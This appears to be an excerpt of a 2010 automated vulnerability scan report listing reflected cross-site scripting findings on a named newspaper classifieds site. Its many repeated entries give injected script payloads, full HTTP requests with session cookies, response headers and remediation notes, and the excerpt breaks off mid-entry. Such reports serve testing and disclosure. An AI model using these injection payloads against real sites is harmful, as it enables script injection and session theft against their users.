HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:48 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0fff"><script>alert(1)</script>12393b8137 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:21:36 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Njt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1bbe"-alert(1)-"441e6b8ef00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:21:37 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Nzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f319"><script>alert(1)</script>753c6886db6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:21:37 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Nzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c8f"-alert(1)-"52f037de594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:21:38 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5ODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f3cc"-alert(1)-"380ba0e14e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing8f3cc"-alert(1)-"380ba0e14e4/rent/apartment/-/-/usa:ny:newyork/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:51 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a24"><script>alert(1)</script>2a2f193d597 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing60a24"><script>alert(1)</script>2a2f193d597/rent/apartment/-/-/usa:ny:newyork/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:50 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ad2b"-alert(1)-"6f787bddca5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing/rent7ad2b"-alert(1)-"6f787bddca5/apartment/-/-/usa:ny:newyork/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:53 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bad1"><script>alert(1)</script>63ee40d0fad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing/rent7bad1"><script>alert(1)</script>63ee40d0fad/apartment/-/-/usa:ny:newyork/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:52 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1b60"-alert(1)-"e28bfea4659 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housingd1b60"-alert(1)-"e28bfea4659/sale/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:46 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Njt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54945"><script>alert(1)</script>9f14a9819b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing54945"><script>alert(1)</script>9f14a9819b6/sale/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:46 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Njt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6665e"><script>alert(1)</script>8d16d82beca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing/sale6665e"><script>alert(1)</script>8d16d82beca/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:47 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Nzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a03c7"-alert(1)-"846ae1a119a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing/salea03c7"-alert(1)-"846ae1a119a/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:48 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac3ed"><script>alert(1)</script>7d4d5e2ea5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /infoac3ed"><script>alert(1)</script>7d4d5e2ea5e/privacy/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:25:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd10f"-alert(1)-"09a106370b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infofd10f"-alert(1)-"09a106370b4/privacy/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:25:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
1.174. http://www.classifieds.nypost.com/info/privacy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/info/privacy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d69"><script>alert(1)</script>f53af88dd7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
